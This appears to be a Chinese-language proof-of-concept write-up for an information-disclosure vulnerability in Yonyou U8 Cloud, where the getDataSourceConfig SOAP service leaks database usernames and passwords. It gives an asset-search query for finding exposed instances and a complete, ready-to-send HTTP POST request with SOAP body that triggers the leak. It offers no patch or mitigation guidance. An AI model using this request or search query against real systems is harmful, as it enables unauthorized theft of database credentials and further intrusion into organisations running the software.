用友U8 Cloud getDataSourceConfig存在信息泄露漏洞
一、漏洞描述
用友U8 Cloud getDataSourceConfig存在信息泄露漏洞,泄露数据库账号及密码等敏感信息。
二、影响版本
- 用友U8 Cloud
三、资产测绘
- hunter
app.name="用友 U8 Cloud"
- 登录页面
四、漏洞复现
POST /uapws/service/nc.itf.ses.inittool.SESInitToolService HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=1EEDC1D7DC0B27ABD0731F81178DC50D.server; JSESSIONID=8BDDF6D86AFB789CF58994EC3E00DB3B.server
Upgrade-Insecure-Requests: 1
SOAPAction: urn:getDataSourceConfig
Content-Type: text/xml;charset=UTF-8
Host: xx.xx.xx.xx
Content-Length: 245
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ses="http://inittool.ses.itf.nc/SESInitToolService">
<soapenv:Header/>
<soapenv:Body>
<ses:getDataSourceConfig/>
</soapenv:Body>
</soapenv:Envelope>